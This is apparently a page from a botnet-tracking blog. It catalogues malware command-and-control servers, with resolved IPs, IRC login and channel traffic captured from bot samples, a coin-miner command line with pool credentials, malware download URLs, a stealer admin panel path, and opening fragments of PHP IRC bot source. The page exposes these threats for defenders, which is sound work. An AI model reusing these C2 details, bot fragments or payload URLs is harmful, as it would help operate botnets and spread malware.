Resolved : [xxxd2.com] To [199.168.140.38] Remote Host Port Number 173.192.224.115 80 199.15.234.7 80 199.168.140.38 7777 PASS Eshuxx NICK n{US|XPa}evkfwgc USER evkfwgc 0 0 :evkfwgc JOIN #eshu Eshuxx PRIVMSG #eshu :[d=”http://www.fotosprivadas.com/chicas/update/Ruco.exe” s=”172032 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 Sample hosting infos: http://whois.domaintools.com/199.168.140.38
new.pusikuracbre.me(CoinMiner hosted in Russian Federation Selectel Ltd.)
From same lamer here http://www.exposedbotnets.com/search?q=8332 Sample Sample Sample Resolved : [new.pusikuracbre.me] To [31.186.102.181] Resolved : [new.pusikuracbre.me] To [31.186.102.180] Resolved : [new.pusikuracbre.me] To [31.186.102.155] Running process miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss Xandora results here hosting infos: http://whois.domaintools.com/31.186.102.180
75.77.40.195(ngrBot hosted in United States Greenville Windstream Nuvox Inc)
Remote Host Port Number 199.15.234.7 80 75.77.40.195 6668 PASS ngrBot PRIVMSG #asiksi# :[DNS]: Blocked “windowsupdate.microsoft.com” NICK n{US|XPa}vxpwwmw USER vxpwwmw 0 0 :vxpwwmw JOIN #asiksi# asdr3ny PRIVMSG #asiksi# :[DNS]: Blocked “www.microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “microsoft.com” PRIVMSG #asiksi# :[DNS]: Blocked “update.microsoft.com” Now talking in #asiksi# Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.comRead more...
www.kavalier2012.ru(UFR Stealer Gate Admin Panel hosted in Latvia Rn Data Sia)
Sample here UFR Stealer Admin Panel www.kavalier2012.ru/gate/ufr.php hosting infos: http://whois.domaintools.com/195.3.146.46
o.ksah4ck.com(irc botnet hosted in United States Ft. Wayne Comcast Business Communications Llc)
Resolved : [o.ksah4ck.com] To [70.88.160.105] Resolved : [o.ksah4ck.com] To [66.41.211.152] Remote Host Port Number 66.41.211.152 3921 NICK [0]USA|XP-SP2[P]552515 USER [0]USA|XP-SP2[P]552515 “localhost” “o.ksah4ck.com” :Notepad. JOIN #errorz hosting infos: http://whois.domaintools.com/70.88.160.105
v1.0 Ultimate phpB(Linux bots hosted in Brazil Comite Gestor Da Internet No Brasil)
Albanian hecker using php bots to flood irc channels ##################################################################### #v1.0 Ultimate phpB. Enjoy ! ! ! ! ! # # # # # # # # Fixed By TiRoNcI_BoY® # # Albhack@msn.com # ##################################################################### <? set_time_limit(0); error_reporting(0); class pBot { ####################### V1.0 CONFIGURATION ######################## var $config = array("server"=>"189.30.30.10", # "port"=>6667, //port do server #Read more...
irc.ganyot.us.to(Linux bots hosted in Korea, Republic Of Seoul Hanbiro)
I found this link http://focori.com.br/images/x.php it was a php shell uploaded to vulnerable site inside i found the bot used for exploiting vulnerable sites <? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the botRead more...
cube.sdeirc.net(ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)
Our anonymous friend pointed this url http://cbteam.ws/(inside u have samples) i checked files and i found this botnet wich i allready posted ip’s in the blog Resolved : [cube.sdeirc.net] To [89.248.166.139] Remote Host Port Number cube.sdeirc.net 7392 PASS none NICK New{US-XP-x86}1124207 USER 1124207 “” “1124207” :1124207 MODE New{US-XP-x86}1124207 +iMmx JOIN #a secret JOIN #rndbot zragRead more...
LilyJade Software (malware downloader hosted in United States Redmond Microsoft Corp)
Got the sample from our anonymous friend and here is what it does 1.downloads file installer.gif GET /installer.gif?action=started&browser=ie6&ver=1_16_149_149&bic=66583225931340E1B463893B68AD2174IE&app=4761&appver=0&verifier=eb9f1208f7e0fabe1db48c4f79a1fbad&srcid=0&subid=0&zdata=0&ff=1&ch=1&default=X&os=XP&admin=1&type=14337 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: stats.crossrider.com Connection: Keep-Alive Cache-Control: no-cache 2.downloads and install fake chrome The data identified by the following URLs was then requested from the remote web server: http://o-o.preferred.xo-ord1.v9.lscache2.c.pack.google.com/edgedl/chrome/install/1123.1/chrome_installer.exe?cms_redirect=yes http://crt.usertrust.com/AddTrustExternalCARoot.p7c http://app-static.crossrider.com/plugin/apps/4761/plugins/1_16_149_149/ie6/plugins.json?ver=2 http://app-static.crossrider.com/plugin/opensearch/ie/4761.xml http://cotssl.crossrider.com/plugin/apps/4761/manifest/1_16_149_149/ie6/manifest.xml?ver=0 http://crl.verisign.com/pca3.crl http://crl.verisign.com/ThawteTimestampingCA.crlRead more...